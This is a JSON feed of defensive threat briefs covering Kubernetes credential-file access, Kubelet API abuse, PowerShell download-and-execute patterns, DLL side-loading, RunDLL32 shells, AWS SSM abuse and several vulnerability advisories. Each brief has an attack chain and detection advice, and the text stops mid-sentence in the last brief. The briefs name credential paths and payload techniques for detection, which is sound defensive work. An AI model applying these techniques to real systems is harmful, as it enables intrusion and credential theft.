{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/execution/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic License v2"],"_cs_severities":["high"],"_cs_tags":["kubernetes","credential-access","execution"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis detection identifies Kubernetes pod exec sessions accessing sensitive files or credential paths. The goal is to detect attackers attempting to steal credentials or configuration information from within Kubernetes pods. This often occurs after initial access and may precede lateral movement, privilege escalation, or data exfiltration. The detection focuses on command lines that reference paths related to service account tokens, kubelet configuration, host identity stores, common private keys, keystore extensions, process environment dumps, and configuration files with embedded secrets. 
The rule is designed to catch both interactive and scripted access, and includes exclusions for benign reads of resolv.conf.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains initial access to a Kubernetes cluster, potentially through a compromised application or misconfigured service.\u003c/li\u003e\n\u003cli\u003eAttacker uses \u003ccode\u003ekubectl exec\u003c/code\u003e or similar tools to execute commands within a pod.\u003c/li\u003e\n\u003cli\u003eThe executed command attempts to read sensitive files or directories within the pod\u0026rsquo;s filesystem, such as \u003ccode\u003e/var/run/secrets/kubernetes.io/serviceaccount/token\u003c/code\u003e to obtain the pod\u0026rsquo;s service account token.\u003c/li\u003e\n\u003cli\u003eThe command may also target host-level files if the pod has hostPath mounts or runs in a privileged context, like \u003ccode\u003e/etc/shadow\u003c/code\u003e or \u003ccode\u003e/etc/passwd\u003c/code\u003e for credential access.\u003c/li\u003e\n\u003cli\u003eThe attacker may attempt to dump process environments via \u003ccode\u003e/proc/\u0026lt;pid\u0026gt;/environ\u003c/code\u003e to extract sensitive information stored as environment variables.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages obtained credentials or configuration to move laterally to other pods or nodes within the cluster.\u003c/li\u003e\n\u003cli\u003eThe attacker escalates privileges within the cluster by abusing stolen service account tokens or node credentials.\u003c/li\u003e\n\u003cli\u003eThe final objective is to exfiltrate sensitive data, deploy malicious workloads, or disrupt services within the Kubernetes environment.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to the compromise of sensitive data, including credentials, configuration files, and application secrets. 
This can enable attackers to move laterally within the Kubernetes cluster, escalate privileges, and potentially gain control over the entire environment. The severity of the impact depends on the sensitivity of the data exposed and the level of access achieved by the attacker.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the provided Sigma rule to your SIEM to detect sensitive file access within Kubernetes pod exec sessions.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts triggered by the Sigma rule, focusing on the \u003ccode\u003eEsql.access_type\u003c/code\u003e field to prioritize incidents.\u003c/li\u003e\n\u003cli\u003eReview and tighten RBAC permissions for pod exec to limit access to authorized users and service accounts.\u003c/li\u003e\n\u003cli\u003eImplement admission controls to prevent pods from running in privileged mode or using hostPath mounts unless absolutely necessary.\u003c/li\u003e\n\u003cli\u003eMonitor Kubernetes audit logs for suspicious \u003ccode\u003ekubectl exec\u003c/code\u003e activity, including unusual command lines or access patterns.\u003c/li\u003e\n\u003cli\u003eRegularly rotate Kubernetes service account tokens and other sensitive credentials to minimize the impact of potential breaches.\u003c/li\u003e\n\u003cli\u003eUse the provided Kubernetes audit log query to proactively search for historical instances of sensitive file access.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-04T21:42:34Z","date_published":"2026-05-04T21:42:34Z","id":"/briefs/2024-01-kubernetes-pod-exec-sensitive-file-access/","summary":"This rule detects Kubernetes pod exec sessions where the decoded command line references sensitive files or paths such as mounted service account tokens, kubelet and control-plane configuration, host identity stores, private keys, and process environment dumps, aiming to identify potential lateral movement, privilege escalation, or 
credential theft.","title":"Kubernetes Pod Exec Sensitive File or Credential Path Access","url":"https://feed.craftedsignal.io/briefs/2024-01-kubernetes-pod-exec-sensitive-file-access/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["kubernetes","kubelet","lateral-movement","discovery","execution","linux"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThis detection identifies potential direct Kubelet API access attempts on Linux systems. The Kubelet, acting as the primary node agent, exposes an API accessible via ports 10250 and 10255. Attackers may exploit this API to enumerate pods, fetch logs, or even attempt remote execution. This access can lead to significant breaches in Kubernetes environments, facilitating discovery, lateral movement, and ultimately, compromise of sensitive data or control over cluster resources. The detection focuses on identifying process executions where the command-line arguments contain URLs targeting these Kubelet ports, indicating a potential attempt to interact with the Kubelet API directly.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a compromised host within the Kubernetes cluster or a host with network access to the Kubelet ports.\u003c/li\u003e\n\u003cli\u003eThe attacker uses a utility like \u003ccode\u003ecurl\u003c/code\u003e, \u003ccode\u003ewget\u003c/code\u003e, \u003ccode\u003epython\u003c/code\u003e, or similar tools to craft an HTTP request targeting the Kubelet API on ports 10250 or 10255.\u003c/li\u003e\n\u003cli\u003eThe request includes a path like \u003ccode\u003e/pods\u003c/code\u003e, \u003ccode\u003e/runningpods\u003c/code\u003e, \u003ccode\u003e/metrics\u003c/code\u003e, \u003ccode\u003e/exec\u003c/code\u003e, or \u003ccode\u003e/containerLogs\u003c/code\u003e to gather information about the cluster\u0026rsquo;s state and 
configuration.\u003c/li\u003e\n\u003cli\u003eThe attacker examines the response to identify potential targets for lateral movement, such as specific pods or containers of interest.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to execute commands within a container using the \u003ccode\u003e/exec\u003c/code\u003e endpoint, potentially leveraging exposed service account tokens or other credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker uses gathered information to move laterally to other pods or nodes within the cluster, escalating privileges as they go.\u003c/li\u003e\n\u003cli\u003eThe attacker compromises sensitive data or critical applications running within the Kubernetes cluster.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to full cluster compromise. Attackers can gain unauthorized access to sensitive data, disrupt critical applications, and move laterally to other resources within the Kubernetes environment. This could lead to significant financial losses, reputational damage, and legal liabilities. 
The potential impact includes data breaches, denial of service, and complete control over the Kubernetes infrastructure.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eKubelet API Access via Process Arguments\u003c/code\u003e to your SIEM to detect suspicious process executions.\u003c/li\u003e\n\u003cli\u003eRestrict access to Kubelet ports 10250/10255 at the network layer to limit pod-to-node or host-to-node traffic as recommended in the overview section.\u003c/li\u003e\n\u003cli\u003eHarden Kubelet configuration by disabling anonymous authentication and enforcing webhook authentication/authorization as described in the overview section.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-04T21:18:23Z","date_published":"2026-05-04T21:18:23Z","id":"/briefs/2024-01-09-kubelet-access/","summary":"This rule detects potential direct Kubelet API access attempts on Linux by identifying process executions whose arguments contain URLs targeting Kubelet ports (10250/10255) enabling discovery and lateral movement in Kubernetes environments.","title":"Potential Direct Kubelet API Access via Process Arguments","url":"https://feed.craftedsignal.io/briefs/2024-01-09-kubelet-access/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Defender XDR","Elastic Defend"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","execution","windows"],"_cs_type":"advisory","_cs_vendors":["Elastic","Microsoft","Crowdstrike","SentinelOne"],"content_html":"\u003cp\u003eThis detection identifies suspicious child processes spawned by Zoom.exe, potentially indicating an attempt to evade detection or exploit vulnerabilities within the Zoom application. The rule focuses on detecting instances where command interpreters like cmd.exe, PowerShell, or PowerShell ISE are launched as child processes of Zoom. 
This behavior can be indicative of an attacker attempting to execute malicious commands or scripts within the context of the Zoom application, potentially escalating privileges or gaining unauthorized access to system resources. It\u0026rsquo;s crucial for defenders to investigate such occurrences, as they may signify ongoing exploitation or malicious activity leveraging Zoom as an initial access vector.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eUser launches the Zoom application (Zoom.exe).\u003c/li\u003e\n\u003cli\u003eA vulnerability in Zoom is exploited, or the user is socially engineered into running a malicious command.\u003c/li\u003e\n\u003cli\u003eZoom.exe spawns a child process, such as cmd.exe, powershell.exe, pwsh.exe, or powershell_ise.exe.\u003c/li\u003e\n\u003cli\u003eThe spawned process executes commands or scripts, potentially downloading or executing malware.\u003c/li\u003e\n\u003cli\u003eThe malicious script or command performs reconnaissance activities on the system.\u003c/li\u003e\n\u003cli\u003eThe script establishes persistence by creating a scheduled task or modifying registry keys.\u003c/li\u003e\n\u003cli\u003eThe attacker gains remote access to the compromised system.\u003c/li\u003e\n\u003cli\u003eThe attacker performs lateral movement and data exfiltration.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation could allow attackers to execute arbitrary commands, escalate privileges, and compromise the affected system. Depending on the user\u0026rsquo;s privileges, attackers could gain access to sensitive data, install malware, or pivot to other systems on the network. 
The impact ranges from data breaches to complete system compromise, potentially affecting all users within the organization who utilize the Zoom application.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Suspicious Zoom Child Process\u0026rdquo; to your SIEM to detect command interpreters spawned by Zoom.exe. Tune the rule for your environment to minimize false positives.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging (Event ID 1) to capture detailed information about process executions, which is essential for the Sigma rule above.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, focusing on the command-line arguments and network connections of the spawned processes.\u003c/li\u003e\n\u003cli\u003eMonitor Windows Security Event Logs for process creation events related to Zoom.exe and its child processes to identify suspicious behavior.\u003c/li\u003e\n\u003cli\u003eConsider implementing application control policies to restrict the execution of unauthorized processes within the Zoom application context.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-04T14:17:05Z","date_published":"2026-05-04T14:17:05Z","id":"/briefs/2024-11-suspicious-zoom-child-process/","summary":"A suspicious Zoom child process was detected, indicating a potential attempt to run unnoticed by masquerading as Zoom.exe or exploiting a vulnerability, resulting in the execution of cmd.exe, powershell.exe, pwsh.exe, or powershell_ise.exe.","title":"Suspicious Zoom Child Process Execution","url":"https://feed.craftedsignal.io/briefs/2024-11-suspicious-zoom-child-process/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","Microsoft Defender XDR","Sysmon","Crowdstrike","SentinelOne Cloud Funnel","Elastic 
Endgame"],"_cs_severities":["medium"],"_cs_tags":["powershell","malware","execution"],"_cs_type":"advisory","_cs_vendors":["Elastic","Microsoft","Crowdstrike","SentinelOne"],"content_html":"\u003cp\u003eThis detection rule identifies the execution of PowerShell with suspicious argument values on Windows systems. This behavior is frequently associated with malware installation and other malicious activities. PowerShell is a powerful scripting language, and adversaries often exploit its capabilities to execute malicious scripts, download payloads, and obfuscate commands. The rule focuses on detecting patterns such as encoded commands, suspicious downloads (e.g., using WebClient or Invoke-WebRequest), and various obfuscation techniques used to evade detection. The rule is designed to work with various data sources, including Elastic Defend, Windows Security Event Logs, Sysmon, and third-party EDR solutions like CrowdStrike, Microsoft Defender XDR, and SentinelOne, enhancing its applicability across different environments.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system (e.g., through phishing or exploiting a vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker uses PowerShell to download a malicious payload from a remote server using commands like \u003ccode\u003eDownloadFile\u003c/code\u003e or \u003ccode\u003eDownloadString\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe downloaded payload is often encoded or obfuscated to evade detection. Common techniques include Base64 encoding, character manipulation, and compression.\u003c/li\u003e\n\u003cli\u003ePowerShell is then used to decode or deobfuscate the payload using methods like \u003ccode\u003e[Convert]::FromBase64String\u003c/code\u003e or \u003ccode\u003e[char[]](...) 
-join ''\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe deobfuscated payload is executed directly in memory using techniques like \u003ccode\u003eiex\u003c/code\u003e (Invoke-Expression) or \u003ccode\u003eReflection.Assembly.Load\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe executed payload performs malicious actions, such as installing malware, establishing persistence, or exfiltrating data.\u003c/li\u003e\n\u003cli\u003eThe attacker may use techniques like \u003ccode\u003eWebClient\u003c/code\u003e to download files from a remote URL.\u003c/li\u003e\n\u003cli\u003eCommands like \u003ccode\u003enslookup -q=txt\u003c/code\u003e are used for command and control.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to malware installation, data theft, system compromise, and further propagation of the attack within the network. The detection of suspicious PowerShell arguments helps to identify and prevent these malicious activities before significant damage can occur. Without proper detection, attackers can maintain persistence, escalate privileges, and compromise sensitive data. 
The rule helps defenders identify and respond to these threats quickly, minimizing the impact of potential attacks.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rules provided in this brief to your SIEM to detect suspicious PowerShell activity.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging with command line arguments to ensure the necessary data is captured for the Sigma rules to function effectively.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rules to determine the legitimacy of the PowerShell activity and take appropriate remediation steps.\u003c/li\u003e\n\u003cli\u003eContinuously tune the Sigma rules based on your environment to reduce false positives and improve detection accuracy.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-04T14:17:05Z","date_published":"2026-05-04T14:17:05Z","id":"/briefs/2024-09-susp-powershell-args/","summary":"This rule identifies the execution of PowerShell with suspicious argument values, often observed during malware installation, by detecting unusual PowerShell arguments indicative of abuse, focusing on patterns like encoded commands, suspicious downloads, and obfuscation techniques.","title":"Suspicious Windows PowerShell Arguments Detected","url":"https://feed.craftedsignal.io/briefs/2024-09-susp-powershell-args/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["WinWord.exe","EXPLORER.EXE","w3wp.exe","DISM.EXE","Microsoft Defender XDR"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","execution","dll-side-loading","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThis detection rule identifies instances of Windows trusted programs such as WinWord.exe, EXPLORER.EXE, w3wp.exe, and DISM.EXE executing from unusual paths or after being renamed, which may indicate DLL side-loading. 
DLL side-loading is a defense evasion technique where a malicious DLL is placed in the same directory as a legitimate executable. When the executable runs, it may load the malicious DLL instead of the legitimate one, allowing the attacker to execute arbitrary code within the context of the trusted process. The detection logic focuses on process executions that deviate from standard installation paths. The targeted processes are commonly used and often whitelisted, making this a potent technique for adversaries to bypass security controls.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access to the system (e.g., through phishing or exploitation of a vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker identifies a trusted Windows program vulnerable to DLL side-loading (WinWord.exe, EXPLORER.EXE, w3wp.exe, or DISM.EXE).\u003c/li\u003e\n\u003cli\u003eThe attacker drops a malicious DLL into a directory where the trusted program is expected to load DLLs from, often alongside a renamed or copied version of the legitimate executable.\u003c/li\u003e\n\u003cli\u003eAlternatively, the attacker renames the trusted program and places it in a non-standard path.\u003c/li\u003e\n\u003cli\u003eThe attacker executes the renamed or moved trusted program from the non-standard path.\u003c/li\u003e\n\u003cli\u003eThe trusted program loads the malicious DLL due to DLL search order hijacking.\u003c/li\u003e\n\u003cli\u003eThe malicious DLL executes arbitrary code within the context of the trusted process.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves persistence, elevates privileges, or performs other malicious activities, potentially evading detection due to the trusted process context.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful DLL side-loading attack allows the attacker to execute arbitrary code within the context of a 
trusted Microsoft process. This can lead to privilege escalation, persistence, and further compromise of the system. Since the malicious code is running within a trusted process, it can bypass application whitelisting and other security controls, making it difficult to detect. This can lead to data theft, system disruption, or the installation of malware.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Potential DLL Side-Loading via Trusted Microsoft Programs\u0026rdquo; to your SIEM to detect suspicious executions of trusted programs from non-standard paths or with modifications.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging (Event ID 1) to provide the necessary data for the Sigma rule to function correctly.\u003c/li\u003e\n\u003cli\u003eReview and tune the exclusion paths in the Sigma rule to avoid false positives from legitimate software updates, custom enterprise applications, or virtual environments.\u003c/li\u003e\n\u003cli\u003eMonitor process execution paths using the Sigma rule \u0026ldquo;Potential DLL Side-Loading via Trusted Microsoft Programs\u0026rdquo; and investigate any deviations from standard installation paths.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-04T14:17:05Z","date_published":"2026-05-04T14:17:05Z","id":"/briefs/2026-05-dll-side-loading/","summary":"This rule detects potential DLL side-loading attempts by identifying instances of Windows trusted programs (WinWord.exe, EXPLORER.EXE, w3wp.exe, DISM.EXE) being started after being renamed or from a non-standard path, which is a common technique to evade defenses by side-loading a malicious DLL into the memory space of a trusted process.","title":"Potential DLL Side-Loading via Trusted Microsoft Programs","url":"https://feed.craftedsignal.io/briefs/2026-05-dll-side-loading/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["M365 
Defender","Elastic Defend","SentinelOne Cloud Funnel"],"_cs_severities":["low"],"_cs_tags":["execution","command-shell","rundll32"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","SentinelOne"],"content_html":"\u003cp\u003eAttackers commonly abuse RunDLL32, a legitimate Windows utility, to execute malicious code by hosting it within DLLs. This technique allows adversaries to launch command shells like cmd.exe or PowerShell, effectively bypassing traditional security controls. Defenders should be aware of this technique because it provides a stealthy way for attackers to execute arbitrary commands, potentially leading to further compromise of the system. This activity is detected by monitoring for command shells initiated by RunDLL32, while excluding known benign patterns to reduce false positives. The detection rule was last updated on 2026/05/04 and supports multiple data sources, including Elastic Defend, Microsoft Defender XDR, and Sysmon.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access to the system through an exploit or social engineering.\u003c/li\u003e\n\u003cli\u003eThe attacker uses RunDLL32.exe to execute a malicious DLL.\u003c/li\u003e\n\u003cli\u003eRunDLL32.exe loads the specified DLL into memory.\u003c/li\u003e\n\u003cli\u003eThe malicious DLL contains code to execute a command shell (cmd.exe or powershell.exe).\u003c/li\u003e\n\u003cli\u003eRunDLL32.exe spawns a command shell process.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the command shell to execute commands for reconnaissance.\u003c/li\u003e\n\u003cli\u003eThe attacker may use the command shell to download additional payloads.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the command shell to perform lateral movement.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to execute arbitrary 
commands on the compromised system. While the rule is rated \u0026ldquo;low\u0026rdquo; severity, this initial access can lead to credential access (T1552) and further lateral movement within the network. Attackers can potentially gain full control of the system, leading to data theft, system disruption, or other malicious activities.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Command Shell Activity Started via RunDLL32\u0026rdquo; to your SIEM and tune for your environment.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging (Event ID 1) to provide the necessary data for this detection.\u003c/li\u003e\n\u003cli\u003eReview the process details of RunDLL32.exe to confirm the parent-child relationship with the command shell, helping to reduce false positives.\u003c/li\u003e\n\u003cli\u003eImplement enhanced monitoring for rundll32.exe and related processes to detect similar activities in the future and improve response times.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-04T14:17:05Z","date_published":"2026-05-04T14:17:05Z","id":"/briefs/2026-05-rundll32-cmd-shell/","summary":"This rule detects command shell activity, such as cmd.exe or powershell.exe, initiated by RunDLL32, a technique commonly abused by attackers to execute malicious code and bypass security controls.","title":"Command Shell Activity Started via RunDLL32","url":"https://feed.craftedsignal.io/briefs/2026-05-rundll32-cmd-shell/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["AWS Systems Manager Session Manager"],"_cs_severities":["medium"],"_cs_tags":["aws","ssm","session-manager","execution","cloud"],"_cs_type":"advisory","_cs_vendors":["Amazon"],"content_html":"\u003cp\u003eAWS Systems Manager (SSM) Session Manager provides interactive shell access to EC2 instances and hybrid nodes without the need for bastion hosts or open inbound ports. 
Attackers can abuse this functionality by leveraging compromised AWS credentials or IAM roles with \u003ccode\u003essm:StartSession\u003c/code\u003e permissions to gain unauthorized access to target systems. This allows for remote execution of commands and lateral movement within the AWS environment. The technique involves spawning child processes from the SSM session worker process to perform malicious activities. Defenders should monitor for unusual process execution patterns originating from SSM sessions to identify potential abuse.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains access to valid AWS credentials or IAM role with \u003ccode\u003essm:StartSession\u003c/code\u003e permissions.\u003c/li\u003e\n\u003cli\u003eAttacker initiates an SSM session to a target EC2 instance or hybrid node using the compromised credentials.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003essm-session-worker\u003c/code\u003e process is started on the target instance to manage the interactive session.\u003c/li\u003e\n\u003cli\u003eAttacker executes commands within the session, spawning child processes from the \u003ccode\u003essm-session-worker\u003c/code\u003e process.\u003c/li\u003e\n\u003cli\u003eAttacker may use scripting languages such as PowerShell or Bash to execute malicious code (e.g., using \u003ccode\u003eawsrunPowerShellScript\u003c/code\u003e or \u003ccode\u003eawsrunShellScript\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThese scripts perform reconnaissance, download additional tools, or attempt credential access.\u003c/li\u003e\n\u003cli\u003eAttacker moves laterally to other instances or resources within the AWS environment.\u003c/li\u003e\n\u003cli\u003eThe ultimate objective is often data exfiltration, privilege escalation, or maintaining persistent access.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can 
lead to unauthorized access to sensitive data, compromise of critical systems, and lateral movement within the AWS environment. The impact can range from data breaches to complete control of the compromised infrastructure. The number of affected systems depends on the scope of the compromised credentials and the attacker\u0026rsquo;s ability to move laterally. Organizations using AWS SSM are at risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rules in this brief to your SIEM and tune for your environment to detect suspicious child processes spawned by \u003ccode\u003essm-session-worker\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eCorrelate process activity with AWS CloudTrail logs for \u003ccode\u003eStartSession\u003c/code\u003e and related API calls to identify the IAM principal initiating the session (see the overview section for API names).\u003c/li\u003e\n\u003cli\u003eImplement strict IAM policies and regularly review AWS credentials to minimize the risk of credential compromise.\u003c/li\u003e\n\u003cli\u003eMonitor \u003ccode\u003eprocess.command_line\u003c/code\u003e, \u003ccode\u003eprocess.executable\u003c/code\u003e, \u003ccode\u003eprocess.user.name\u003c/code\u003e for unusual activity within SSM sessions.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-01T20:57:28Z","date_published":"2026-05-01T20:57:28Z","id":"/briefs/2024-01-aws-ssm-session-manager-abuse/","summary":"Adversaries abuse AWS Systems Manager (SSM) Session Manager to gain remote execution and lateral movement within AWS environments by spawning malicious child processes from the SSM session worker, leveraging legitimate AWS credentials and IAM permissions.","title":"AWS SSM Session Manager Child Process Execution 
Abuse","url":"https://feed.craftedsignal.io/briefs/2024-01-aws-ssm-session-manager-abuse/"},{"_cs_actors":[],"_cs_cves":[{"cvss":4.3,"id":"CVE-2026-41079"}],"_cs_exploited":false,"_cs_products":["CUPS"],"_cs_severities":["critical"],"_cs_tags":["cups","vulnerability","privilege-escalation","execution","denial-of-service"],"_cs_type":"advisory","_cs_vendors":["CUPS"],"content_html":"\u003cp\u003eMultiple vulnerabilities have been identified in CUPS, a popular open-source printing system. These vulnerabilities can be exploited by an attacker to bypass security measures, execute arbitrary code, escalate privileges, manipulate data, or cause a denial-of-service (DoS) condition. The specifics of the vulnerabilities are not detailed in the source document, but the potential impact suggests a high level of risk. Defenders should monitor CUPS deployments for suspicious activity.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains initial access to a system with a vulnerable CUPS installation.\u003c/li\u003e\n\u003cli\u003eThe attacker exploits a vulnerability in CUPS (specific CVE not identified) to bypass authentication or authorization controls.\u003c/li\u003e\n\u003cli\u003eLeveraging the bypassed security measures, the attacker executes arbitrary code within the context of the CUPS service.\u003c/li\u003e\n\u003cli\u003eThe attacker escalates privileges, potentially gaining root or system-level access, due to insecure configurations or further vulnerabilities within CUPS.\u003c/li\u003e\n\u003cli\u003eWith elevated privileges, the attacker manipulates sensitive data related to print jobs, configurations, or user information.\u003c/li\u003e\n\u003cli\u003eAlternatively, the attacker triggers a denial-of-service condition, rendering the printing service unavailable by exploiting a resource exhaustion vulnerability.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the compromised CUPS service as a 
pivot point to gain access to other systems on the network.\u003c/li\u003e\n\u003cli\u003eThe final objective is to compromise sensitive data, disrupt printing services, or gain a foothold for further attacks within the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of these CUPS vulnerabilities could lead to significant damage, including unauthorized access to sensitive documents, disruption of critical printing services, and potential compromise of other systems on the network. The lack of specific victim numbers or sector targeting in the source document suggests this is a general advisory.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor CUPS server logs for unexpected process execution and privilege escalation attempts (enable process_creation logging and deploy the \u0026ldquo;Detect Suspicious CUPS Process Execution\u0026rdquo; Sigma rule).\u003c/li\u003e\n\u003cli\u003eInspect CUPS configuration files for unauthorized modifications that could indicate malicious activity (enable file_event logging and deploy the \u0026ldquo;Detect Suspicious CUPS Configuration Modification\u0026rdquo; Sigma rule).\u003c/li\u003e\n\u003cli\u003eAnalyze network traffic to and from CUPS servers for anomalous patterns that may indicate exploitation attempts or data exfiltration (enable network_connection logging).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-30T09:43:58Z","date_published":"2026-04-30T09:43:58Z","id":"/briefs/2026-05-cups-vulns/","summary":"Multiple vulnerabilities in CUPS allow an attacker to bypass security measures, execute arbitrary code, escalate privileges, manipulate data, or cause a denial-of-service condition.","title":"Multiple Vulnerabilities in 
CUPS","url":"https://feed.craftedsignal.io/briefs/2026-05-cups-vulns/"},{"_cs_actors":[],"_cs_cves":[{"id":"CVE-2025-68741"},{"cvss":7.8,"id":"CVE-2025-38024"},{"cvss":7.8,"id":"CVE-2025-38180"},{"cvss":7.8,"id":"CVE-2026-23111"},{"cvss":7.1,"id":"CVE-2026-23204"}],"_cs_exploited":false,"_cs_products":["Red Hat CodeReady Linux Builder","Red Hat Enterprise Linux"],"_cs_severities":["critical"],"_cs_tags":["vulnerability","kernel","redhat","execution","privilege-escalation","denial-of-service"],"_cs_type":"advisory","_cs_vendors":["Red Hat"],"content_html":"\u003cp\u003eOn April 30, 2026, CERT-FR published an advisory regarding multiple vulnerabilities in the Red Hat Linux kernel. These vulnerabilities, detailed in Red Hat Security Advisories RHSA-2026:10756, RHSA-2026:10996, and RHSA-2026:11313, can lead to significant security risks including arbitrary code execution, privilege escalation, and remote denial of service. The affected systems include various versions and architectures of Red Hat CodeReady Linux Builder and Red Hat Enterprise Linux. Successful exploitation of these vulnerabilities could allow attackers to gain unauthorized access, control systems, or disrupt services, impacting the confidentiality, integrity, and availability of affected systems.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Compromise (via unconfirmed vector):\u003c/strong\u003e An attacker identifies a vulnerable Red Hat Linux system running an affected kernel version. While the exact exploit vector isn\u0026rsquo;t specified in the advisory, it involves a vulnerability in the 